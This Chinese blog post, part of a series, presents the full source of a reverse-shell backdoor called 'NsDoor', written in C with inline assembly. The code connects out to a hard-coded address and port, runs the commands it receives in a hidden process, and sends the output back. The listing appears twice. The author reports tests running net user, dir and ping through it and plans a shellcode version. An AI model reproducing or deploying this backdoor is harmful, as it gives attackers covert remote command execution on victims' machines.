循序渐进NsDoor(七)
本来这个和上一篇就是连着的,但是上一篇也太长了点
所以在这再开始
//#include<iostream>
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
//using namespace std;
//#define PORT 1517
//#define IP "192.168.6.20"
// NsDoor (as posted): a reverse-connect command shell written almost entirely in MSVC
// inline assembly.  No Win32/CRT routine is called by name — every call goes through an
// absolute address copied from one specific Windows build (the 0x71A2xxxx / 0x7C8xxxxx
// constants in the first block), so the usual import-table indicators for these APIs are
// absent, and the same bytes do nothing meaningful on any other build or under ASLR.
// What the code does: connect out to the hard-coded 192.168.6.20:1517, then loop forever —
// recv() a command line, run it via CreateProcessA() with stdout/stderr redirected into an
// inheritable pipe, ReadFile() the pipe and push the output back over the socket.
// Register roles held across the whole function (ebx/esi/edi are callee-saved under the
// Win32 stdcall/cdecl conventions, so they survive the calls):
//   ebx = socket, esi = &sockaddr_in (on the stack), edi = &STARTUPINFOA (on the stack).
int main()
{
//WSADATA ws;
//WSAStartup(MAKEWORD(2,2),&ws);
// Function-address table.  Every slot is ABOVE the frame: with the usual
// push ebp / mov ebp,esp prologue, [ebp+4] is main's own return address and [ebp+8].. is
// the caller's argument area, so this overwrites main's return address and scribbles past
// the frame; it is only tolerated because the while(true) below never returns.
// [ebp+56]/[ebp+60] later receive the pipe handles from CreatePipe; [ebp+80] is cleared and
// not referenced again in this listing.
_asm
{
mov eax,0x71A26A55
mov [ebp+4],eax; WSAStartup
mov eax,0x71A24211
mov [ebp+8],eax; socket
mov eax,0x7C81D827
mov [ebp+12],eax; CreatePipe
mov eax,0x71A2676F
mov [ebp+16],eax; recv
mov eax,0x7C802446
mov [ebp+20],eax; Sleep
mov eax,0x7C922435
mov [ebp+24],eax; memset
mov eax,0x7C80236B
mov [ebp+28],eax; CreateProcessA
mov eax,0x71A24A07
mov [ebp+32],eax; connect
mov eax,0x71A24C27
mov [ebp+36],eax ; send
mov eax,0x7C801812
mov [ebp+40],eax ; ReadFile
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+80],0
}
// WSAStartup(0x0202, lpWSAData): 400 bytes are reserved on the stack for the WSADATA and
// never released (there is no matching add esp anywhere in main).
_asm
{
sub esp,400
push esp
push 0x202
call [ebp+4]
}
//SOCKET sockfd;
//sockfd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6); ebx keeps the socket for the rest of main.
_asm
{
push 6
push 1
push 2
call [ebp+8]
//mov sockfd,eax
mov ebx,eax
}
//struct sockaddr_in server;
//server.sin_family = AF_INET;
//server.sin_port = htons(PORT);
//server.sin_addr.S_un.S_addr = inet_addr(IP);
//while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);
// sockaddr_in assembled directly on the stack (little-endian dwords):
//   0xED050002 -> sin_family = 2 (AF_INET), sin_port = 0x05ED = 1517 in network byte order
//   0x1406A8C0 -> sin_addr   = 192.168.6.20 (the commented-out PORT/IP above)
// esi = &sockaddr_in afterwards.  connect() is retried until it stops returning -1; each
// retry pushes the 8-byte structure again, so 8 bytes of stack go per attempt while the
// peer is unreachable.
_asm
{
conn:
push 0x1406A8C0
mov eax,0xED050002
push eax
mov esi,esp
push 0x10
push esi
push ebx
call [ebp+32]
cmp eax,-1
je conn
}
//SECURITY_ATTRIBUTES pipeattr;
//HANDLE hReadPipe,hWritePipe;
//pipeattr.nLength = 12;
//pipeattr.bInheritHandle = true;
//pipeattr.lpSecurityDescriptor = 0;
//SECURITY_ATTRIBUTES* ppi = &pipeattr;
//int size = sizeof pipeattr;
//cout<<&pipeattr<<endl<<size<<endl;
//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);
//HANDLE* pr,pw;
//pr = &hReadPipe;
//pw = &hWritePipe;
// SECURITY_ATTRIBUTES {nLength=12, lpSecurityDescriptor=0, bInheritHandle=1} built on the
// stack so both pipe ends are inheritable by the child process, then
// CreatePipe(&[ebp+56] /*hReadPipe*/, &[ebp+60] /*hWritePipe*/, &sa, 0).
_asm
{
push 0x00000001
push 0x00000000
push 0x0000000c
mov eax,esp
push 0
push eax
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
call [ebp+12]
}
//STARTUPINFOA si;
//cout<<&si<<endl<<sizeof si<<endl;
//ZeroMemory(&si,sizeof si);
//si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
//si.wShowWindow = SW_HIDE;
//si.hStdOutput = si.hStdError = hWritePipe;//(original note: no input pipe — hStdInput is left at 0)
//cout<<&si<<endl<<sizeof si<<endl;
// STARTUPINFOA (17 dwords = 68 bytes) pushed in reverse field order so that edi = &si:
//   cb .. dwFillAttribute = 0, dwFlags = 0x101 (STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW),
//   wShowWindow = 0 (SW_HIDE), lpReserved2 = 0, hStdInput = 0, hStdOutput = hStdError = 0x0F8C.
// Note that 0x0F8C is a hard-coded handle value, not the hWritePipe that CreatePipe just
// stored in [ebp+60], and that cb is 0 rather than sizeof(STARTUPINFOA).
_asm
{
push 0x00000F8C
push 0x00000F8C
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000101
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
mov edi,esp
}
//unsigned long lBytesRead = 0;
//PROCESS_INFORMATION ProcessInformation;
//char Buf[1024] = {0};
//char RecvBuf[200] = {0};
// Command loop: never exits, so the "return 0" below is unreachable.
while(true)
{
//recv(sockfd,RecvBuf,200,0);
// recv(sockfd, RecvBuf = [ebp-4CCh], 200, 0)
_asm
{
push 0
push 200
lea eax,[ebp-4cch]
push eax
push ebx
call [ebp+16]
}
//cout<<RecvBuf<<endl;
//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);
//STARTUPINFOA* psi = &si;
//PROCESS_INFORMATION* proc = &ProcessInformation;
//cout<<proc<<endl<<sizeof ProcessInformation<<endl;
// lpProcessInformation points at four pre-set dwords pushed here rather than at a zeroed
// PROCESS_INFORMATION.  CreateProcessA(NULL, RecvBuf, NULL, NULL, bInheritHandles=TRUE,
// 0, NULL, NULL, &si, &pi) is retried until it returns non-zero; as with the connect
// retry, every attempt pushes 16 more bytes that are never popped.
_asm
{
conn2:
push 0x7c969564
push 0x7c98d144
push 0xffffffff
push 0x7c98d168
mov eax,esp
push eax
push edi
push 0
push 0
push 0
push 1
push 0
push 0
lea eax,[ebp-4cch]
push eax
push 0
call [ebp+28]
cmp eax,0
je conn2
}
//Sleep(1000);
// The C comment says 1000, the code actually waits 300 ms.
_asm
{
push 300
call [ebp+20]
}
//cout<<RecvBuf<<endl;
// ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);
//LPDWORD plbr = &lBytesRead;
// ReadFile(hReadPipe = [ebp+56], Buf = [ebp-4CBh], 1024, lpNumberOfBytesRead = edi, NULL).
// edi still points at the STARTUPINFOA, so the byte count lands in si.cb; that dword is
// what the send step below pushes as its length.
_asm
{
push 0
push edi
push 1024
lea eax,[ebp-4cbh]
push eax
push [ebp+56]
call [ebp+40]
}
// cout<<Buf<<endl;
//cout<<"flag"<<endl;
//send(sockfd,Buf,1024,0);
// Intended: send(sockfd, Buf, <bytes read, taken from [edi]>, 0) — see the C comment above.
_asm
{
push 0
push [edi]
lea eax,[ebp-4cbh]
push eax
push ebx
call esi
}
//cout<<Buf<<endl;
//memset(Buf,0,1024);
// memset(Buf, 0, 1024)
_asm
{
push 1024
push 0
lea eax,[ebp-4cbh]
push eax
call [ebp+24]
}
//Sleep(100);
// Sleep(100)
_asm
{
push 100
call [ebp+20]
}
//memset(RecvBuf,0,200);
// memset(RecvBuf, 0, 200)
_asm
{
push 200
push 0
lea eax,[ebp-4cch]
push eax
call [ebp+24]
}
}
return 0;
}
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
//using namespace std;
//#define PORT 1517
//#define IP "192.168.6.20"
// NsDoor (as posted): a reverse-connect command shell written almost entirely in MSVC
// inline assembly.  No Win32/CRT routine is called by name — every call goes through an
// absolute address copied from one specific Windows build (the 0x71A2xxxx / 0x7C8xxxxx
// constants in the first block), so the usual import-table indicators for these APIs are
// absent, and the same bytes do nothing meaningful on any other build or under ASLR.
// What the code does: connect out to the hard-coded 192.168.6.20:1517, then loop forever —
// recv() a command line, run it via CreateProcessA() with stdout/stderr redirected into an
// inheritable pipe, ReadFile() the pipe and push the output back over the socket.
// Register roles held across the whole function (ebx/esi/edi are callee-saved under the
// Win32 stdcall/cdecl conventions, so they survive the calls):
//   ebx = socket, esi = &sockaddr_in (on the stack), edi = &STARTUPINFOA (on the stack).
int main()
{
//WSADATA ws;
//WSAStartup(MAKEWORD(2,2),&ws);
// Function-address table.  Every slot is ABOVE the frame: with the usual
// push ebp / mov ebp,esp prologue, [ebp+4] is main's own return address and [ebp+8].. is
// the caller's argument area, so this overwrites main's return address and scribbles past
// the frame; it is only tolerated because the while(true) below never returns.
// [ebp+56]/[ebp+60] later receive the pipe handles from CreatePipe; [ebp+80] is cleared and
// not referenced again in this listing.
_asm
{
mov eax,0x71A26A55
mov [ebp+4],eax; WSAStartup
mov eax,0x71A24211
mov [ebp+8],eax; socket
mov eax,0x7C81D827
mov [ebp+12],eax; CreatePipe
mov eax,0x71A2676F
mov [ebp+16],eax; recv
mov eax,0x7C802446
mov [ebp+20],eax; Sleep
mov eax,0x7C922435
mov [ebp+24],eax; memset
mov eax,0x7C80236B
mov [ebp+28],eax; CreateProcessA
mov eax,0x71A24A07
mov [ebp+32],eax; connect
mov eax,0x71A24C27
mov [ebp+36],eax ; send
mov eax,0x7C801812
mov [ebp+40],eax ; ReadFile
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+80],0
}
// WSAStartup(0x0202, lpWSAData): 400 bytes are reserved on the stack for the WSADATA and
// never released (there is no matching add esp anywhere in main).
_asm
{
sub esp,400
push esp
push 0x202
call [ebp+4]
}
//SOCKET sockfd;
//sockfd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6); ebx keeps the socket for the rest of main.
_asm
{
push 6
push 1
push 2
call [ebp+8]
//mov sockfd,eax
mov ebx,eax
}
//struct sockaddr_in server;
//server.sin_family = AF_INET;
//server.sin_port = htons(PORT);
//server.sin_addr.S_un.S_addr = inet_addr(IP);
//while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);
// sockaddr_in assembled directly on the stack (little-endian dwords):
//   0xED050002 -> sin_family = 2 (AF_INET), sin_port = 0x05ED = 1517 in network byte order
//   0x1406A8C0 -> sin_addr   = 192.168.6.20 (the commented-out PORT/IP above)
// esi = &sockaddr_in afterwards.  connect() is retried until it stops returning -1; each
// retry pushes the 8-byte structure again, so 8 bytes of stack go per attempt while the
// peer is unreachable.
_asm
{
conn:
push 0x1406A8C0
mov eax,0xED050002
push eax
mov esi,esp
push 0x10
push esi
push ebx
call [ebp+32]
cmp eax,-1
je conn
}
//SECURITY_ATTRIBUTES pipeattr;
//HANDLE hReadPipe,hWritePipe;
//pipeattr.nLength = 12;
//pipeattr.bInheritHandle = true;
//pipeattr.lpSecurityDescriptor = 0;
//SECURITY_ATTRIBUTES* ppi = &pipeattr;
//int size = sizeof pipeattr;
//cout<<&pipeattr<<endl<<size<<endl;
//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);
//HANDLE* pr,pw;
//pr = &hReadPipe;
//pw = &hWritePipe;
// SECURITY_ATTRIBUTES {nLength=12, lpSecurityDescriptor=0, bInheritHandle=1} built on the
// stack so both pipe ends are inheritable by the child process, then
// CreatePipe(&[ebp+56] /*hReadPipe*/, &[ebp+60] /*hWritePipe*/, &sa, 0).
_asm
{
push 0x00000001
push 0x00000000
push 0x0000000c
mov eax,esp
push 0
push eax
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
call [ebp+12]
}
//STARTUPINFOA si;
//cout<<&si<<endl<<sizeof si<<endl;
//ZeroMemory(&si,sizeof si);
//si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
//si.wShowWindow = SW_HIDE;
//si.hStdOutput = si.hStdError = hWritePipe;//(original note: no input pipe — hStdInput is left at 0)
//cout<<&si<<endl<<sizeof si<<endl;
// STARTUPINFOA (17 dwords = 68 bytes) pushed in reverse field order so that edi = &si:
//   cb .. dwFillAttribute = 0, dwFlags = 0x101 (STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW),
//   wShowWindow = 0 (SW_HIDE), lpReserved2 = 0, hStdInput = 0, hStdOutput = hStdError = 0x0F8C.
// Note that 0x0F8C is a hard-coded handle value, not the hWritePipe that CreatePipe just
// stored in [ebp+60], and that cb is 0 rather than sizeof(STARTUPINFOA).
_asm
{
push 0x00000F8C
push 0x00000F8C
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000101
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
mov edi,esp
}
//unsigned long lBytesRead = 0;
//PROCESS_INFORMATION ProcessInformation;
//char Buf[1024] = {0};
//char RecvBuf[200] = {0};
// Command loop: never exits, so the "return 0" below is unreachable.
while(true)
{
//recv(sockfd,RecvBuf,200,0);
// recv(sockfd, RecvBuf = [ebp-4CCh], 200, 0)
_asm
{
push 0
push 200
lea eax,[ebp-4cch]
push eax
push ebx
call [ebp+16]
}
//cout<<RecvBuf<<endl;
//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);
//STARTUPINFOA* psi = &si;
//PROCESS_INFORMATION* proc = &ProcessInformation;
//cout<<proc<<endl<<sizeof ProcessInformation<<endl;
// lpProcessInformation points at four pre-set dwords pushed here rather than at a zeroed
// PROCESS_INFORMATION.  CreateProcessA(NULL, RecvBuf, NULL, NULL, bInheritHandles=TRUE,
// 0, NULL, NULL, &si, &pi) is retried until it returns non-zero; as with the connect
// retry, every attempt pushes 16 more bytes that are never popped.
_asm
{
conn2:
push 0x7c969564
push 0x7c98d144
push 0xffffffff
push 0x7c98d168
mov eax,esp
push eax
push edi
push 0
push 0
push 0
push 1
push 0
push 0
lea eax,[ebp-4cch]
push eax
push 0
call [ebp+28]
cmp eax,0
je conn2
}
//Sleep(1000);
// The C comment says 1000, the code actually waits 300 ms.
_asm
{
push 300
call [ebp+20]
}
//cout<<RecvBuf<<endl;
// ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);
//LPDWORD plbr = &lBytesRead;
// ReadFile(hReadPipe = [ebp+56], Buf = [ebp-4CBh], 1024, lpNumberOfBytesRead = edi, NULL).
// edi still points at the STARTUPINFOA, so the byte count lands in si.cb; that dword is
// what the send step below pushes as its length.
_asm
{
push 0
push edi
push 1024
lea eax,[ebp-4cbh]
push eax
push [ebp+56]
call [ebp+40]
}
// cout<<Buf<<endl;
//cout<<"flag"<<endl;
//send(sockfd,Buf,1024,0);
// Intended: send(sockfd, Buf, <bytes read, taken from [edi]>, 0) — see the C comment above.
_asm
{
push 0
push [edi]
lea eax,[ebp-4cbh]
push eax
push ebx
call esi
}
//cout<<Buf<<endl;
//memset(Buf,0,1024);
// memset(Buf, 0, 1024)
_asm
{
push 1024
push 0
lea eax,[ebp-4cbh]
push eax
call [ebp+24]
}
//Sleep(100);
// Sleep(100)
_asm
{
push 100
call [ebp+20]
}
//memset(RecvBuf,0,200);
// memset(RecvBuf, 0, 200)
_asm
{
push 200
push 0
lea eax,[ebp-4cch]
push eax
call [ebp+24]
}
}
return 0;
}
前面已经分析了很多函数,我下面就不仔细分析了,把我分析好的代码贴出来show下,呵呵:
呵呵,很强大吧
看着轻松,我花了三天才搞定所有,里面的意外太多了,内存一个字节一个字节地抠数据,地址跳转不对,返回值被刷掉,意外太多了……
累死我了
测试报告:
目前这个代码基本能使用,偶尔出现死在ReadFile处的事情,这个很早以前就遇到过,还有时候会遇到Send函数的地址访问冲突,
但是debug的时候都很正常,反弹后门完全可以使用;不是debug时,偶尔会出现客户端和服务端互相等待的事情……
服务端
客户端
呵呵,访问成功啦
执行net user和time的情形
Dir的结果
Dir&time的结果
输入错误的结果
Ping的结果,照样出现延迟,不过一点也不影响结果,呵呵
哈哈,到这里NsDoor的前期版本,或者说服务端优化基本快完了,技术性的工作已经没了,期待 shellcode吧
---------------by NewSketcher
Time: 080822 21:20